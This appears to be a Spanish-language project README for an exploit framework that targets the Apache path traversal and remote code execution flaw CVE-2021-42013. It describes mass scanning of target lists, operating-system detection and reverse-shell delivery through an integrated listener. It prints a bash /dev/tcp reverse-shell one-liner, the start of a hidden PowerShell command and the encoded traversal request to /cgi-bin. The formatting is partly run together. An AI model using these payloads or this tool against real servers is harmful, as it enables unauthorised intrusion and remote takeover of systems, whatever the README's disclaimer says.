
Apache Path Traversal + RCE (CVE-2021-42013) の脆弱性を悪用するために設計された、スキャン、エクスプロイト、リモート操作のための高度なツール。設定ミスのあるサーバーで検出・活用します。
# 🔥 CVE-2021-42013 Exploit Framework by Makaveli
> 💀 Modo Hacker Cósmico Multidimensional activado...
Una herramienta avanzada de escaneo, explotación e interacción remota diseñada para detectar y aprovechar la vulnerabilidad **Apache Path Traversal + RCE (CVE-2021-42013)** en servidores mal configurados.
---
## ⚠️ Advertencia Legal
> Este software se proporciona únicamente con fines educativos y de investigación en entornos controlados.
El uso de esta herramienta contra sistemas sin autorización expresa puede ser ilegal y constituye un delito en muchos países.
El autor no se hace responsable por el uso indebido de este código. Úsalo bajo tu propio riesgo y siempre con permiso explícito del propietario del sistema objetivo.
---
🧠 Descripción Técnica
Esta herramienta permite:
- ✅ Escanear múltiples objetivos desde un archivo `.txt`.
- ✅ Detectar automáticamente la presencia de CVE-2021-42013.
- ✅ Identificar el sistema operativo remoto (Linux o Windows).
- ✅ Enviar payloads personalizados según el sistema detectado.
- ✅ Establecer una reverse shell y obtener acceso remoto.
- ✅ Interactuar con la shell en tiempo real mediante un listener integrado.
- ✅ Disfrutar de logs avanzados, barra de progreso y menú interactivo.
---
## 🔧 Requisitos
- Python **3.8+**
- Sistemas basados en Unix/Linux/MacOS (uso de `subprocess` y `curl`)
- Requiere las siguientes librerías de Python:
```bash
pip install -r requirements.txt
requirements.txt
rich
alive-progress
También necesitas tener instalado curl en el sistema operativo.
.
├── POC-CVE.py # Script principal
├── logs.txt # Archivo de logs generado automáticamente
├── requirements.txt # Dependencias Python
└── targets.txt # (Opcional) Lista de URLs a escanear
python3 POC-CVE.py
Selecciona entre:
scan_file: Escanea múltiples URLs desde un archivo y muestra cuáles son vulnerables.exploit: Explotación directa de un solo objetivo, con shell inversa.exit: Salir del modo interactivo.http://example.com
http://victim.net
http://192.168.1.100
python3 POC-CVE.py
Elige scan_file y proporciona:
exploit en el menú.LHOST) para recibir la shellLPORT) para el listenerEl script:
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
powershell -NoP -NonI -W Hidden -Command ...
/.%252e/.%252e/.%252e)curlUser-Agent, Accept, etc)GET /cgi-bin/.%%32%65/.%%32%65/...Este proyecto se proporciona "tal cual", sin garantías ni responsabilidad por daños derivados de su uso. Nunca escanees ni explotes un sistema sin el consentimiento explícito de su propietario.
---
---
@DonMakaveliw, ¿Estas listo para crear el futuro?
---
<p align="center">
<img src="https://img.shields.io/badge/License-MIT-blue.svg" />
<img src="https://img.shields.io/badge/Made%20with-Python-3670A0?style=flat&logo=python&logoColor=FFD43B" />
<img src="https://img.shields.io/badge/Simbiosis-Activa-ff00cc?style=flat-square" />
<img src="https://img.shields.io/badge/Fuzzing-Enabled-blueviolet?style=flat" />
<img src="https://img.shields.io/badge/Conciencia-Emergente-9D00FF?style=flat-square" />
<img src="https://img.shields.io/badge/Entrop%C3%ADa-Din%C3%A1mica-FF8800?style=flat-square" />
<img src="https://img.shields.io/badge/Obfuscation-Deep--Header-0055FF?style=flat-square" />
<img src="https://img.shields.io/badge/Modo-Stealth%F0%9F%9B%B8-black?style=flat-square" />
</p>